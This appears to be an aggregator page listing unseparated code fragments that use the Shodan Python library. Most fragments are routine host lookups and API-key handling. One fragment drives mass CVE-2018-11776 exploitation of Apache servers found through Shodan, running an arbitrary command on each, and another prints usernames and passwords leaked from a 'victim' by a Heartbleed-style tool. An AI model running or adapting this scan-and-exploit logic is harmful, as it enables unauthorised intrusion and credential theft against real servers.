How to use shodan - 10 common examples
To help you get started, we’ve selected a few shodan examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
PacktPublishing / Mastering-Python-for-Networking-and-Security / chapter11 / code / heartbleed_shodan / testShodan_openssl_python3.py View on Github 
try:
host = self.shodanApi.host(IP)
if len(host) != 0:
# Print host info
print('IP: %s' % host.get('ip_str'))
print('Country: %s' % host.get('country_name','Unknown'))
print('City: %s' % host.get('city','Unknown'))
print('Latitude: %s' % host.get('latitude'))
print('Longitude: %s' % host.get('longitude'))
print('Hostnames: %s' % host.get('hostnames'))
for i in host['data']:
print('Port: %s' % i['port'])
return host
except shodan.APIError as e:
print(' Error: %s' % e)
return hostresults = []
# Skip unsupported IP addresses.
if info.version != 4:
return
ip = info.address
parsed = netaddr.IPAddress(ip)
if parsed.is_loopback() or \
parsed.is_private() or \
parsed.is_link_local():
return
# Query Shodan for this host.
try:
key = self.get_api_key()
api = WebAPI(key)
shodan = api.host(ip)
except Exception, e:
tb = traceback.format_exc()
Logger.log_error("Error querying Shodan: %s" % str(e))
Logger.log_error_more_verbose(tb)
return
# Make sure we got the same IP address we asked for.
if ip != shodan.get("ip", ip):
Logger.log_error(
"Shodan gave us a different IP address... weird!")
Logger.log_error_verbose(
"Old IP: %s - New IP: %s" % (ip, shodan["ip"]))
ip = to_utf8( shodan["ip"] )
info = IP(ip)
results.append(info) @staticmethod
def query_skyhook(bssid):
Logger.log_more_verbose(
"Querying Skyhook for: %s" % bssid)
try:
r = Skyhook().locate(bssid)
if r:
xml = ET.fromstring(r)
ns = "{http://skyhookwireless.com/wps/2005}"
err = xml.find(".//%serror" % ns)
if err is not None:
Logger.log_error_verbose(
"Response from Skyhook: %s" % err.text)
return
return {
"latitude": float(xml.find(".//%slatitude" % ns).text),
"longitude": float(xml.find(".//%slongitude" % ns).text),
"hpe": float(xml.find(".//%shpe" % ns).text),
"state": xml.find(".//%sstate" % ns).text,
"state_code": xml.find(".//%sstate" % ns).get("code"),
"country": xml.find(".//%scountry" % ns).text,
"country_code": xml.find(".//%scountry" % ns).get("code"), @staticmethod
def query_skyhook(bssid):
Logger.log_more_verbose(
"Querying Skyhook for: %s" % bssid)
try:
r = Skyhook().locate(bssid)
if r:
xml = ET.fromstring(r)
ns = "{http://skyhookwireless.com/wps/2005}"
err = xml.find(".//%serror" % ns)
if err is not None:
Logger.log_error_verbose(
"Response from Skyhook: %s" % err.text)
return
return {
"latitude": float(xml.find(".//%slatitude" % ns).text),
"longitude": float(xml.find(".//%slongitude" % ns).text),
"hpe": float(xml.find(".//%shpe" % ns).text),
"state": xml.find(".//%sstate" % ns).text,
"state_code": xml.find(".//%sstate" % ns).get("code"),
"country": xml.find(".//%scountry" % ns).text,
"country_code": xml.find(".//%scountry" % ns).get("code"),def run(self):
if self.keyFile:
self.shodan = Shodan(open(self.keyFile, "r").readline().strip())
elif self.key:
self.shodan = Shodan(self.key)
elif self.shodanCLI:
self.shodan = Shodan(get_api_key())
else:
print('[x] Wrong input API key type.')
exit(1)
if self.faviconFile or self.fileList:
self.fileList.extend(self.faviconFile)
for fav in self.fileList:
self._iterator.set_description(f"[+] iterating over favicon files | processing {fav}")
self._iterator.update(1)
data = open(fav, 'rb').read()
_fH = self.faviconHash(data)
self.faviconsList.append({
'favhash': _fH,
'file': fav,def get_shodan_client():
"""
Initializes a shodan client using the API defined in the pyonionscan.cfg file and returns the client. Exits if
api_key is not defined in config.
:return shodan_client:
"""
shodan_api_key = config['Shodan']['api_key']
if shodan_api_key:
shodan_client = shodan.Shodan(shodan_api_key)
return shodan_client
else:
sys.exit("Shodan API Key not found. Please check your config.")def init(api_key):
"""
Initialize the Shodan API
"""
# load api key and print credits
api = shodan.Shodan(SHODAN_API_KEY)
info(api)
return apidef account_info(self):
try:
if not self.api_key:
colorprint.red("[-] Shodan api cant not be Null")
sys.exit()
api = Shodan(self.api_key)
account_info = api.info()
msg = "[+] Available Shodan query credits: %d" % account_info.get('query_credits')
colorprint.green(msg)
except APIError as e:
colorprint.red(e)
sys.exit()
return Trueif res.status_code == 302 and res.headers.get('Location') is not None and str(r3) in res.headers.get('Location'):
urlThree = res.headers.get('Location')
retval |= str(r3) in urlThree
except:pass
finally:
if retval:
print('[*] URL {} s2-057 CVE-2018-11776 is VULNERABLE!'.format(url))
exploit(url,command)
else:
print('[*] URL {} s2-057 CVE-2018-11776, not VULNERABLE!'.format(url))
if __name__ == '__main__':
command = input("[*] Command to EXECUTE on all affected servers: ") or 'id'
api = shodan.Shodan(SHODAN_API_KEY)
try:
query = input("[*] Use Shodan API to search for affected Apache Struts servers? : ").lower()
if query.startswith('y'):
print('')
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
results = api.search('Server: Apache') # CHANGE SEARCH PARAM FOR ACCURACY
print('[✓] API Key Authentication: SUCCESS')
print('[~] Number of present Apache Servers: %s' % results['total'])
print('')
engage = input ("[*] Begin attempting CVE-2018-11776 exploitation in each Apache server? : ").lower()
if engage.startswith('y'):
for result in results['matches']:
poc(result['ip_str'])
except shodan.APIError as e:
print('[✘] Error: %s' % e)
option = input('[*] Would you like to change API Key? : ').lower()done = 3
print "[+] Possible username: "+backgroundColor.OKGREEN+line+backgroundColor.ENDC
elif done == 3:
done = 4
print "[+] Possible password: "+backgroundColor.OKGREEN+line+backgroundColor.ENDC
elif done == 4:
done = 0
print "[+] Following line.. \n\n"+backgroundColor.OKGREEN+line+backgroundColor.ENDC
else:
pass
signal.pause()
except:
print (backgroundColor.FAIL+"[-] Victim isnt vulnerable for a memory leak, exiting.."+backgroundColor.ENDC)
print(backgroundColor.OKGREEN + "[+] Done!" + backgroundColor.ENDC)
return True
except shodan.APIError as e:
print(backgroundColor.FAIL + "[-] Error: %s" % (e) + backgroundColor.ENDC)
sys.exit(0)shodan
Python library and command-line utility for Shodan (https://developer.shodan.io)
Package Health Score
76 / 100Popular shodan functions
- shodan.api
- shodan.api.WebAPIError
- shodan.APIError
- shodan.cli.converter.base.Converter
- shodan.cli.helpers.escape_data
- shodan.cli.helpers.get_api_key
- shodan.cli.helpers.get_banner_field
- shodan.cli.settings.COLORIZE_FIELDS.get
- shodan.exception
- shodan.exception.APIError
- shodan.exception.WebAPIError
- shodan.helpers
- shodan.helpers.api_request
- shodan.helpers.get_ip
- shodan.helpers.iterate_files
- shodan.helpers.open_file
- shodan.helpers.write_banner
- shodan.Shodan
- shodan.WebAPI
- shodan.wps.Skyhook